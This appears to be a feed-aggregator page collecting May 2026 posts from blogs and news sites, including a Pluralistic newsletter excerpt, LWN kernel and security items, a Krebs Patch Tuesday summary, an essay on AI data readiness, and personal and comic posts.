The frustrations of actually existing bureaucracy do not merely arise from inept or technically-inadequate solutions to the principal-agent problem. They emerge too from the collision of multiple incommensurable demands, each with its own problems and benefits, so that there are no optimal design solutions. Those who build or reform bureaucracies, like those who build other artifacts, need to satisfice across multiple intersecting needs and pathologies. Designs that neatly address one kind of problem may radically worsen others. Actually-existing AI has its own imperfections, some of which are endemic. Grafting AI systems onto existing bureaucracies will solve some problems but will worsen others and make altogether new ones. It will not eliminate the political difficulties of mediating across different, often non-commensurable, goals. Imagining replacing bureaucracy wholesale with AI is only plausible if one waves away the actual difficulties associated with real social technologies.


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago Woz's programmable remotes https://web.archive.org/web/20010603184833/http://www.celadon.com/Industrial/PIC200/pic200oem.html

#25yrsago Furbeowulf http://www.trygve.com/furbeowulf.html

#20yrsago Diebold voting machines can be 0wned in minutes https://blog.citp.princeton.edu/2006/05/11/report-claims-very-serious-diebold-voting-machine-flaws/

#20yrsago British farmer supplies gallows to totalitarian governments http://news.bbc.co.uk/2/hi/uk_news/england/suffolk/4754515.stm

#20yrsago Proposed law requires schools to censor MySpace, LJ, blogs, Flickr https://web.archive.org/web/20060521054806/http://www.pbs.org/teachersource/learning.now/2006/05/new_federal_legislation_would_1.html

#15yrsago Vernor Vinge on the promise, progress and threats of Augmented Reality https://www.ugotrade.com/2011/05/10/interview-with-vernor-vinge-smart-phones-and-the-empowering-aspects-of-social-networks-augmented-reality-are-still-massively-underhyped/

#15yrsago American oligarch buys the right to hire professors at Florida State U https://web.archive.org/web/20110511210435/https://www.tampabay.com/news/business/billionaires-role-in-hiring-decisions-at-florida-state-university-raises/1168680/

#15yrsago National Jukebox: public domain music archive from the Library of Congress https://www.loc.gov/collections/national-jukebox/about-this-collection/

#15yrsago America’s net censorship bill is back and worse than ever https://arstechnica.com/tech-policy/2011/05/revised-net-censorship-bill-requires-search-engines-to-block-sites-too/

#10yrsago DNC Host Committee composed of GOP megadonors, Net Neutrality haters, fracking boosters and anti-Obamacare lobbyists https://web.archive.org/web/20160511160814/https://theintercept.com/2016/05/11/lobbyists-dnc-2016-convention/

#10yrsago Minnesota lawmakers propose bizarre, dangerous PRINCE law https://www.eff.org/deeplinks/2016/05/minnesota-legislators-go-crazy-pushing-dangerous-prince-act

#10yrsago NZ Prime Minister John Key ejected from Parliament over Panama Papers rant https://www.nzherald.co.nz/nz/prime-minister-john-key-thrown-out-of-debating-chamber-by-speaker/A5LQPMGB56QXTGE2ZFIK2MSRPE/?c_id=1&amp;objectid=11637448

#10yrsago Putting two elevators in one shaft https://web.archive.org/web/20160512013856/https://www.wired.com/2016/05/thyssenkrup-twin-elevator/

#10yrsago Germany will end copyright liability for open wifi operators https://torrentfreak.com/germany-to-rescind-piracy-liability-for-open-wifi-operators-160511/

#10yrsago Save Firefox: The W3C’s plan for worldwide DRM would have killed Mozilla before it could start https://www.eff.org/deeplinks/2016/04/save-firefox

#5yrsago Let's eat all the cicadas https://pluralistic.net/2021/05/11/uniboob/#eat-the-brood#5yrsago

#5yrsago Cyclopedia Exotica https://pluralistic.net/2021/05/11/uniboob/#one-eye-and-three-dot-dot-dot


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

16:56

Jonathan Dowland: iPad Mini (2013) [Planet Debian]

In or around 2014 I bought an iPad Mini (2), and following the normal lifecycle of iOS devices, a major OS update eventually killed it as a useful, general-purpose device: operating it was just too sluggish. It remained useful as a streaming media player for a little while longer until eventually the big streamers (BBC iPlayer, Netflix, etc.) stopped supporting the version of their app which the iPad could install: the last officially supported iOS was 12.4.8 in July 2020, and by November it was officially dead.

Old 32bit games

Old 32bit games

During its useful life, the iPad Mini witnessed Apple's transition from 32 to 64 bit apps. In the 32 bit days, there was a little cottage industry of app developers, and in particular, game developers. There were even several independent websites (App Shopper, Pod Gamer, Free-App Hero), which aided in sorting through the morass of apps to find the good ones (then as now, the App Store itself was almost impossible to effectively browse). This all went away during the 32/64 transition, as many small-scale developers weren't actively developing their applications or games any more, and weren't prepared to pay the time or apple tax to rebuild and publish them as 64 bit.

The last version of iOS that supported 32 bit apps on this device was 10.3.3, and by luck, there are some methods available to install this old version of iOS on the Mini 2 Today. A couple of years ago I did so, and I kept no notes so sadly I can't report on which method I used. But it worked, and I was able to install a bunch of old 32 bit games that I had no access to on more modern devices.

Prior to John Carmack's1 departure from iD Software, he'd been responsible for publishing several experimental iD software games on iOS. These mostly disappeared in the 64 bit transition. Amongst them are ports of Wolfenstein 3D, classic Doom, some RAGE tie-ins, but perhaps most interestingly. at least two original games, designed for the phone form factor: Doom 2 RPG and Wolfenstein RPG.

Reading magazine-style things

Reading magazine-style things

Another notable game that disappeared was "Civilisation Revolution", a cut-down Civ game that for a while I was obsessed with. Rather than port it to 64 bit, the publisher withdrew it, and then published a "new" game "Civilisation Revolution 2", requiring a separate purchase. Sadly, it is rubbish, nowhere near as good as the first one.

Anyway, having managed to downgrade it to the 32 bit iOS and install these old lost games, I then, of course, never played them and the device continued to gather dust. I should make clear that, running such an old unpatched iOS version means it's not safe at all to put any kind of sensitive information on this, including entering passwords. I don't recommend even opening the web browser. However, this 12 year old device does have some use as an e-reader, especially for certain types of ebook or magazine, that I've struggled to engage with on other devices. That's a topic for another blog post.


  1. Carmack reportedly also had a pivotal role in convincing Steve Jobs to permit native apps and provide an App Store on iOS: the plan had been to solely support web apps, at least for 3rd parties.

16:49

Yet another Dirty Frag type vulnerability: Fragnesia [LWN.net]

Sam James has sent an announcement to the OSS Security mailing list about another local-privilege-escalation (LPE) exploit in the same class as Dirty Frag, called "Fragnesia". From the disclosure:

This is a separate bug in the ESP/XFRM from dirtyfrag which has received its own patch. However, it is in the same surface and the mitigation is the same as for dirtyfrag.

It abuses a logic bug in the Linux XFRM ESP-in-TCP subsystem to achieve arbitrary byte writes into the kernel page cache of read-only files, without requiring any race condition.

James noted that there is a patch in the works, but it has not yet been pulled into Linus Torvalds's tree nor into any of the stable kernels. A proof of concept exploit is also available.

15:42

Link [Scripting News]

I appreciate that X gave me back access to my account that I was locked out of, but they were apparently charging me for Premium when I couldn't use the account, and had no way to turn it off. Okay they can keep the money. But now I want to turn off Premium for the account I was using when I didn't have access to my real account, and can't find the commands to do that. Asked ChatGPT and it either hallucinated or X removed the command. So near as I can tell I now have two accounts on X that I'm paying $8 a month for Premium on.

15:21

[$] Managing pages outside of the direct map [LWN.net]

When Brendan Jackman proposed a session for the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, his topic was "a pagetable library for the kernel". During the actual memory-management-track session, though, he stated that the idea had "fizzled" and he was going to cover related topics instead. What resulted was a session on ways to efficiently manage pages that are not present in the kernel's direct map.

14:56

Link [Scripting News]

I'm screwing around with the JSONL stuff again. I'm interested in know about any work people have done that process incoming JSONL data. I'd like to see if I'm even in the ballpark of something useful. Today I'm making it so that my app can be used in production to handle more than one stream. The key thing is it's hooked up to FeedLand via a very simple JSON interface delivered in realtime via websockets. For feeds that support rssCloud, the appearance of the new item in the JSONL feed happens a fraction of a second after it was published. That's how fast the web of 2026 is.

14:35

[$] Revisiting mshare [LWN.net]

Linux can share memory between processes, but each process (almost always) has its own set of page tables. In situations where vast numbers of processes are sharing a memory region, the combined size of the page tables can exceed that of the shared memory itself. There has, thus, long been an interest in enabling unrelated processes to share page tables referring to shared memory. Anthony Yznaga is the latest developer to try to push this idea (known as "mshare") forward; he described the status of that work in a memory-management-track discussion at the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit (LSFMM+BPF).

Security updates for Wednesday [LWN.net]

Security updates have been issued by AlmaLinux (corosync, freerdp, git-lfs, glib2, jq, kernel-rt, krb5, libpng, libtiff, openexr, and thunderbird), Debian (exim4), Mageia (apache, perl-Gazelle, php, and sed), Slackware (expat), SUSE (assimp-devel, go1.26, libQt6Svg6, python-jupyterlab, raylib, thunderbird, tor, and trivy), and Ubuntu (exim4).

Sovereign Tech Fund invests in KDE [LWN.net]

The KDE project has announced that it has been awarded over €1 million from the Sovereign Tech Fund to improve its desktop-environment software. "The investment will be used to strengthen the structural reliability and security of KDE's core infrastructure, including Plasma, KDE Linux, and the frameworks underlying its communication services."

13:49

CodeSOD: Over and Under Reaction [The Daily WTF]

Today's anonymous submitter sends us two blocks. The first is a perfectly normal line of React code:

const [width, setWidth] = useState(false)

This creates a width variable, defaulting it to false, and a setWidth function, which lets React detect when you change the variable, and trigger a re-render. Importantly, this mutation only happens on the next render, which means if you call setWidth and then check width, you won't see your change happen.

As I said, this is perfectly normal React code. Well, almost. First, I have to ask: why on Earth is width being set to a boolean value? "How wide are you?" "Yes." It's possible that there's a good reason for this, though I suspect that it's unlikely.

The second issue, however, is that the linter complained that the setter was never actually used. That was odd, because if our submitter grepped the codebase, there were two calls to setWidth. Let's see what that looked like:

const show = (show) => {
    setWidth(show)
    setWidth(!show)
}

We create a function show, where we expect a boolean value, and then we setWidth with that value, and then with the negation of that value. So show(true) will set width to be false. To make matters more confusing, we set width both ways, and I assume this is someone trying to get around React's state management. React won't trigger a re-render if you set the state to a value it already has. So I suspect they're twiddling to try and force it to re-render, and I also suspect that this might not work? Even if it does, this isn't how you should be using React. As I said, I'm no React expert, but as the saying goes: "I don't have to be a helicopter pilot to know that when I see a helicopter hanging upside down from a tree someone messed up."

Our submitter writes:

Got hired to cleanup a mission critical website for a company that had just learned that offshore teams might not be worth the cost saving measures.

"Pay me now or pay me later."

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

13:28

Your AI Problem Is a Data Problem [Radar]

I just sat in a room full of data engineers the other week who were worrying about AI automating them out of work the same way auto manufacturing in Detroit was upended half a century ago.

All AI. All the time. That’s what technology professionals are talking about.

Data scientists, data engineers, and data architects are right to sound an alarm at that. Using AI to solve and automate data problems all the way at the beginning of the pipeline is an obvious use case of agentic engineering in data. Shifting AI left for automation.

That looms as a threat to data engineering positions who own the pipeline underlying the architecture and deliverables. It’s a discussion that we can no longer avoid. In all fields, AI is looming, bringing with it new risks and bigger change.

Introducing AI there can be dangerous, and that’s a conversation all its own. You hear horror stories about AI initiatives that failed—and what failed them.

Agentic frameworks stall because the retrieval layer can’t be trusted. RAG pipelines work in demo then fall apart in production. Problems that should have been solved upstream are solved by building governance tools downstream.

The conversation comes back to one thing. The data wasn’t ready.

Don’t neglect the data layer

A Cloudera and Harvard Business Review study from March 2026 found that only 7% of enterprises consider their data completely ready for AI, and over a quarter said it wasn’t ready at all. Another data point: In Informatica’s 2025 CDO Insights survey, 43% of organizations named data quality and readiness as their top obstacle to AI success. Not model performance. Not tooling. Data.

So why does this keep happening?

Organizations are treating AI as a technology procurement decision. Buy the platform, hire the engineers, deploy the models. But the foundation underneath those initiatives—the data layer—is missing.

The data wasn’t governed. The lineage wasn’t tracked. The pipeline was built for reporting, not for model consumption.

The engineers in that room could easily be part of the solution. Because nobody owned the quality problem. And when the model surfaced a confident, wrong answer, nobody could trace it back to find out why.

That’s not an AI problem. That’s a data problem that AI made visible.

Readiness starts before the model

Data that feeds AI systems needs to be made consistent and owned. Not owned in the sense of having a name in a RACI chart. Owned in the sense that an engineer or data professional is accountable when it degrades. Lineage matters because AI outputs are only as auditable as the data behind them. Quality matters because model performance in production is directly correlated with what goes in.

These aren’t new principles. They’re established data engineering practices. They just haven’t been treated as AI deployment fundamentals. That needs to change.

Data readiness closes the gap between AI ambition and AI outcomes. McKinsey’s 2025 State of AI survey found that organizations investing in their data foundations first were likely to see real financial returns from AI. Without solutions like data contracts between producers and consumers, automated quality monitoring at the pipeline level, and governance frameworks that treat AI as a first-class data consumer rather than an afterthought, your AI spend will be wasted.

Thinking back to my convo with those engineers a few weeks ago, the engineers in that room worried about being automated out of work. Data engineers who understand pipelines, lineage, and quality at depth aren’t facing obsolescence. In fact, there’s a good chance they’ll soon see demand for their services spike, as organizations realize their AI initiatives aren’t failing because they hired the wrong AI engineers. They likely failed because those organizations didn’t invest in the data infrastructure and engineers.

The data engineering job isn’t going away. It’s changing shape as it solves a problem we’re all facing and talking about.

For data engineers, AI readiness is a table stakes deliverable now. That means owning the data that feeds AI systems, and building governance frameworks around what AI actually consumes. AI engineers, for their part, have to stop treating the data layer as someone else’s problem. When an agentic framework stalls or a RAG pipeline falls apart in production, the instinct is to look at the model or the retrieval architecture. The data is usually where the answer is. It behooves these two disciplines to share a definition of “done” that includes the data being ready before the model is deployed rather than after it fails.

The AI problem, for most organizations, is a data problem that can be solved by data engineers and data professionals. The sooner that lands in the boardroom, the better the odds that the next initiative doesn’t end up in the abandoned 42%.

12:14

OpenAI’s GPT-5.5 is as Good as Mythos at Finding Security Vulnerabilities [Schneier on Security]

The UK’s AI Security Institute evaluated GPT-5.5’s ability to find security vulnerabilities, and found that it is comparable to Claude Mythos. Note that the OpenAI model is generally available.

Here is the Institute’s evaluation of Mythos.

And here is an analysis of a smaller, cheaper model. It requires more scaffolding from the prompter, but it is also just as good.

10:28

The airplane oath [Seth's Blog]

You’re flying over Mount Rainier and a hole opens up in the bottom of your airplane. In that moment, you think hard about what you’ve done, what you’re doing, and what matters.

My friend Ty actually had this happen. In that moment, she decided to stop wasting her days on a career that pleased her family, and committed, if she survived, to quit and go build something that mattered to her.

Of course, in the months that followed, honoring the commitment was hard. If it were easy, she would have done it far sooner.

But it’s an oath. The sort of promise you don’t negotiate.

The really cool thing is that you don’t need to avoid a possible plane crash to wake up, see what’s going on in your life and take an oath. You can do it simply because it’s May 13th.

What a chance we each have. To take agency, to make a deal and to honor it. Don’t wait for an excuse to care enough to take an oath. Simply begin.

08:49

The Myriad [Penny Arcade]

New Comic: The Myriad

06:21

Girl Genius for Wednesday, May 13, 2026 [Girl Genius]

The Girl Genius comic for Wednesday, May 13, 2026 has been posted.

Tuesday, 12 May

23:56

Wheat crop failure in US [Richard Stallman's Political Notes]

Global heating has created a wheat crop failure in the US. *Temperature swings have left crops across the Plains in terrible conditions, with some farmers opting not to harvest.*

If we don't curb global heating, this will happen more and more often.

The nocebo effect is real [Richard Stallman's Political Notes]

The nocebo effect is real, just like the placebo effect.

According to one study, the nocebo effect seems to be responsible for around 3/4 of negative reactions to Covid-19 vaccine.

One LLM good at finding exploits in software [Richard Stallman's Political Notes]

Reportedly one LLM is very good at finding exploits in software. People will need to fix them.

Another future LLM may be very good at finding exploits in tax systems. People will need to fix them, too.

UK nationalizing train operating companies [Richard Stallman's Political Notes]

The UK is really nationalizing the train operating companies, reversing one disastrous ideological decision made by the Tories decades ago.

Iranian human rights activist memoir [Richard Stallman's Political Notes]

Narges Mohammadi, Iranian human rights activist, wrote a memoir which describes beatings, solitary confinement, and denial of medical treatment. She is dying in prison, and those cruel state actions are part of the cause.

I wonder why the US persecutor hates the Iranian persecutors so much, given that he seems to be just fine with Russia's persecutor. He surely does not care any more about Iranian's human rights than about Americans' human rights. Perhaps this reflects Netanyahu's influence on him; perhaps he hates Iran's rulers because they persistently organize Shi'ites to oppose Israel on behalf of Palestinians.

Pardoned January 6 rioter sentenced for burglary [Richard Stallman's Political Notes]

*Pardoned January 6 rioter sentenced to seven years for Virginia burglary.*

The bullshitter launched the mob at the Capitol after preparing them with violent hatred, and arranged to make armed support hard for the Capitol police to obtain. In 2025, he pardoned all those who had been convicted for participating in the attack. There is no reasonable doubt that he arranged the attack intentionally and considers it an act of support for him. Justice calls for him to be convicted of the attack and sentenced to prison.

Datacenter planning documents mislead on greenhouse gas emissions [Richard Stallman's Political Notes]

Google datacenter planning documents misleadingly minimized the projected greenhouse gas emissions by a factor of five.

23:49

23:42

Link [Scripting News]

I have regained control of my Twitter account. I really missed it, truth be told. Thanks to Scoble for helping here. As he so often has.

23:35

Patch Tuesday, May 2026 Edition [Krebs on Security]

Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers — including Apple, Google, Microsoft, Mozilla and Oracle — fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.

As it does on the second Tuesday of every month, Microsoft today released software updates to address at least 118 security vulnerabilities in its various Windows operating systems and other products. Remarkably, this is the first Patch Tuesday in nearly two years that Microsoft is not shipping any fixes to deal with emergency zero-day flaws that are already being exploited. Nor have any of the flaws fixed today been previously disclosed (potentially giving attackers a heads up in how to exploit the weakness).

Sixteen of the vulnerabilities earned Microsoft’s most-dire “critical” label, meaning malware or miscreants could abuse these bugs to seize remote control over a vulnerable Windows device with little or no help from the user. Rapid7 has done much of the heavy lifting in identifying some of the more concerning critical weaknesses this month, including:

  • CVE-2026-41089: A critical stack-based buffer overflow in Windows Netlogon that offers an attacker SYSTEM privileges on the domain controller. No privileges or user interaction are required, and attack complexity is low. Patches are available for all versions of Windows Server from 2012 onwards.
  • CVE-2026-41096: A critical RCE in the Windows DNS client implementation worthy of attention despite Microsoft assessing exploitation as less likely.
  • CVE-2026-41103: A critical elevation of privilege vulnerability that allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely.

May’s Patch Tuesday is a welcome respite from April, which saw Microsoft fix a near-record 167 security flaws. Microsoft was among a few dozen tech giants given access to a “Project Glasswing,” a much-hyped AI capability developed by Anthropic that appears quite effective at unearthing security vulnerabilities in code.

Apple, another early participant in Project Glasswing, typically fixes an average of 20 vulnerabilities each time it ships a security update for iOS devices, said Chris Goettl, vice president of product management at Ivanti. On May 11, Apple shipped updates to address at least 52 vulnerabilities and backported the changes all the way to iPhone 6s and iOS 15.

Last month, Mozilla released Firefox 150, which resolved a whopping 271 vulnerabilities that were reportedly discovered during the Glasswing evaluation.

“Since Firefox 150.0.0 released, they have been on a more aggressive weekly cadence for security updates including the release of Firefox 150.0.3 on May Patch Tuesday resolving between three to five CVEs in each release,” Goettl said.

The software giant Oracle likewise recently increased its patch pace in response to their work with Glasswing. In its most recent quarterly patch update, Oracle addressed at least 450 flaws, including more than 300 fixes for remotely exploitable, unauthenticated flaws. But at the end of April, Oracle announced it was switching to a monthly update cycle for critical security issues.

On May 8, Google started rolling out updates to its Chrome browser that fixed an astonishing 127 security flaws (up from just 30 the previous month). Chrome automagically downloads available security updates, but installing them requires fully restarting the browser.

If you encounter any weirdness applying the updates from Microsoft or any other vendor mentioned here, feel free to sound off in the comments below. Meantime, if you haven’t backed up your data and/or drive lately, doing that before updating is generally sound advice. For a more granular look at the Microsoft updates released today, checkout this inventory by the SANS Internet Storm Center.

23:00

Link [Scripting News]

This bit of code kept coming up, so I wanted to make it easier to find.

22:14

The anti-minimalist backlash is the bigger story behind Oxygen’s revival [OSnews]

A few weeks ago, we talked about a project within KDE to revive two of their classic themes, Oxygen and Air, and polish them up to make them usable on the current versions of KDE. The developers and designers working on this project say they’ve been utterly surprised by just how popular this news has proven to be, and Filip Fila published a blog post with some thoughts on this unexpected popularity. Why are people yearning so strongly for user interfaces from the past?

That’s the real story underneath the retro-yearning. It isn’t a simply story of people wanting their childhood from the 2000s back. It’s that a lot of ‘the new’ we’ve been offering doesn’t satisfy. It doesn’t have personality. It doesn’t feel warm. It doesn’t feel like it was made with the idea of being anything more than a clean product that gets the job done. The escapism towards the past is a symptom. A symptom of unmet needs, not mere sentimentality.

↫ Filip Fila

Fila uses modern architecture as an example, and I think it’s an apt one. While monumental modern architecture can easily be beautiful and striking, it’s the mundane buildings all around us that just don’t seem to elicit any positive emotions, no sense of belonging or safety. As Fila also notes, the decades-long swing to minimalism in both architecture and UI design isn’t merely because of a preference among designers, but also because minimalism is a hell of a lot cheaper to produce. A building with very little ornamentation and basic, straight lines is much easier, and thus cheaper, to design, construct, and maintain. The same applies to graphical user interface design.

There are some signs that the pendulum is starting to swing back towards more instead of less, in all aspects of design. More and more people are loudly demanding buildings to adopt more classical elements, and as we can all attest to here on OSNews, the longing for aspects of UI design from the ’90s and early 2000s to make a return is strong. And not just among us deep in the weeds, either; I’ve lost count of the number of times I’ve seen normal people utterly confounded by modern UI design.

Anyway, bring back beveled edges.

21:28

05/12/26 [Flipside]

1 week left in my Kickstarter! Still trying to raise as much as I can for the next volume of my graphic novel! You can order any of the books!

https://www.kickstarter.com/projects/1016357068/flipside-graphic-novel-13th-volume

Google gives early peek at Android laptops: Googlebooks [OSnews]

The news that Google is working to move Chrome OS to the Android technology stack, and that it wants to start putting Android on laptops, is not exactly news, as the company has been talking about it for years. At an Android event today, the company finally unveiled the culmination of all this work: Googlebooks.

We’re bringing together the best of Android, which comes with powerful apps on Google Play and a modern OS that’s designed for Intelligence, and ChromeOS, which comes with the world’s most popular browser. The result is Googlebook: a new category of laptops built with Gemini’s helpfulness at its core, designed to work seamlessly with the devices in your life and powered by premium hardware. We’re sharing a sneak peek into the Googlebook experience today and will have a lot more to share later this year.

↫ Alex Kuscher at The Keyword, a Google blog apparently

The approach here seems very similar to Chromebooks, with Googlebooks being designed and built by various OEMs, but instead of Chrome OS they run Android in desktop mode. Of course, “AI” has been creamed all over these things, to the point where not even the venerable mouse cursor is safe: if you wiggle your cursor, it will turn into “Magic Pointer”, which will highlight various “AI” actions as you hover over stuff on your screen. Google also showed off an “AI”-based feature to create widgets, as well as the ability to access files on your phone right from a Googlebook.

That’s about all we know as far as functionality and features goes. They’re supposed to go on sale later this year, with models coming from Acer, ASUS, Dell, HP, and Lenovo.

21:21

I Didn’t Even Know American Wisteria Was A Thing [Whatever]

Spring is in full swing here in Ohio and it has been both very beautiful and very allergy-inducing. One of the more beautiful aspects is that there is apparently a ton of American Wisteria wrapped around my pergola by the garage, and I find it to be extremely pretty. See for yourself:

A beautiful blossom of the American Wisteria, purple and clustered together into almost hydrangea like shapes.

This particular bloom is more open and blossomed than the others, hence why I took its photo. Before they bloomed, they all looked like tiny purple pinecones. I had no idea that they would open up into these beautiful flower clusters. I’m absolutely thrilled these are wrapped completely around my pergola. I notice their beauty every time I leave my house.

Very grateful to have some pretty purple flowers around.

Have you seen American Wisteria before? Perhaps you’ve seen the wisteria in Japan before? Let me know in the comments, and have a great day!

-AMS

19:07

[$] Using dma-bufs for read and write operations [LWN.net]

The kernel's dma-buf subsystem provides a way for drivers to share memory buffers, usually in order to support efficient device-to-device I/O. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, Pavel Begunkov, assisted by Kanchan Joshi, led a joint session of the storage and memory-management tracks to explore ways to make the use of dma-bufs more efficient yet, and to make them available for read and write operations initiated by user space.

18:21

17:35

Link [Scripting News]

Expanding items on a FeedLand blogroll should be consistently fast now. Just switched to a different server on the backend.

Burnout and Cognitive Debt [Radar]

Steve Yegge’s article about programmer burnout (“The AI Vampire”) along with Margaret Storey’s article about Cognitive Debt started an ongoing conversation about programmer fatigue and software quality—two topics that should be linked, but often aren’t. Steve argues that programming constantly with the help of agentic AI leds to burnout; it’s fast, it’s fun, but keeping up with your agents causes mental strain. He recommends programming with agents no more than 4 or 5 hours per day. I could cynically say that most software developers spend at most 20% of their time writing code, which leaves about an hour and a half for wrestling with agents—but that’s beside the point. Yegge’s point about burnout is important, and is in line with what friends have told me. At some point, you have to put the laptop down.

Storey makes a different point. Agentic engineering is great at creating software that works, but that you don’t quite understand. Like humans, agents can generate a lot of spaghetti code. They can “design” convoluted and inappropriate software structures—I hesitate to call them “architectures”; they’re what happens in the absence of architecture. Agents are very capable of creating technical debt—and not the kind of meaningful technical debt that lets you release a product on time with the knowledge that you need to make pay it back with interest. If nobody is looking hard at the code, the debt can grow without bounds, sort of like not checking your credit card balance. What’s worse—and this is Storey’s contribution—while that technical debt is growing, developers are losing track of the design, the structure, the architecture. She calls that “cognitive debt.” You don’t just have problems in the code; those problems are harder to find and fix than they should be because you’re unclear on the structure of the code you’re working with.

Other voices have made similar points. The Sonarsource blog writes about how AI is reshaping technical debt and creating new burdens, new kinds of toil. In “The Mythical Agent Month,” Wes McKinney links the problem of burnout to the introduction of “accidental complexity” and “agent scope creep,” while Tim O’Brien writes that while scope creep isn’t new, AI supersized its growth. And Addy Osmani writes about finding your parallel agent limit, coming to grips with what you’re capable of accomplishing without compromising your work or your life.

Cognitive debt and burnout aren’t new, alas. With or without AI, we’ve all stayed up to 4AM working on a bug that won’t go away or pursuing an interesting idea to its end. Sometimes that’s heroic, but AI threatens to turn it into a lifestyle. AI fatigue is real, as Siddhant Khare writes, and it’s something we need to talk about. When fatigued, it’s tempting to say “this works, it looks good, and it passes our tests” without considering how the code fits into the overall plan. With 10x code generation, you also get 10x the debt load, and that’s being optimistic. When the debt curve goes exponential, strategies for managing that debt are stressed past the breaking point.

The problem with cognitive debt is that it eventually makes new features and bug fixes difficult or impossible. The code has become so convoluted that it can’t be changed. I’ve certainly done that with hand-written code: added a feature without thinking enough about how the new code fit in, added some more code later, and then—when I needed to add a third feature—discovered that I’d created a problem that wouldn’t be simple to fix. The right stuff was there, but in the wrong places because I wasn’t thinking about the overall structure.

That’s a common enough problem with handwritten code; it’s almost always a problem with legacy code where the original developers and maintainers are no longer around. We need to realize that it’s also a problem with AI-generated code, which has been characterized as legacy code from the day it’s written. Somebody or something has to pay down the debt. As Storey writes, “velocity without understanding is not sustainable”: not for humans, not for machines. If you understand the structure of what you’re building, you can steer the AI away from creating a problem in the first place, or you can use it to author a fix. If you don’t understand the structure or can’t describe it to the AI, you’re lost.

Cognitive debt accumulates much more quickly when you’re burned out. Burnout has always been a problem for programmers, especially for those who really love programming: you stay up all night to solve a problem. And, while some programmers resist using AI to write code, those who use AI frequently find that it exacts the same toll: it’s hard to stop. It is its own kind of toil: toil that gives you a sense of accomplishment and fulfillment, but still leaves you empty.

Agents may not be subject to burnout, but the humans who control them are. Agents are quickly becoming more capable, but they still can’t maintain a sense of the shape and structure of a project over the long term. That’s our job. They can pay down technical debt, but only if properly guided; that’s also our job. And we won’t be able to do either if we’re burned out.

16:56

The Big Idea: Ada Hoffman [Whatever]

When it comes down to it, all humanity really has at the end of the day is our stories. Telling stories around the fire is a tale as old as humans themselves, and author Ada Hoffman expresses the importance of these stories, and the importance of being human, in the Big Idea for their newest novel, Ignore All Previous Instructions.

ADA HOFFMAN:

When I tell people the premise of Ignore All Previous Instructions, they often remark how it reminds them of real life these days. In Ignore, the characters live in a space colony on Callisto where a generative AI company owns everything – and where making art or telling stories, without the AI’s assistance, is strictly not allowed.

Certainly there are parallels between this dystopian premise and my life in 2026 – working as an adjunct for a university computer science department where the people in charge keep yelling about the “pivot to AI” and how terrible it will be if we don’t all get on board.

But I wrote Ignore in 2023.

Publishing is slow, and novelists write about current events at our own peril. In 2023, I could see which way the tech industry hype train was going, but there was no way to know if it would still be going that direction three years later. I hoped it wouldn’t be. I decided to write the story anyway and see how it landed, because the topic was so close to my professional expertise and so close to my heart.

Another part of the novel, even closer to my heart and equally timely, was the problem of queer self-expression and book bans.

In 2023, I was at an early stage in therapy. I was just starting to think back, in ways I hadn’t allowed myself before, about how some of my experiences growing up had shaped me. This included a lot of things, many of them not germane to this post, but it also included the experience of growing up queer without understanding that that’s what it was.

My gut told me that I needed to write about these experiences – more urgently than I had ever needed to write about anything before.

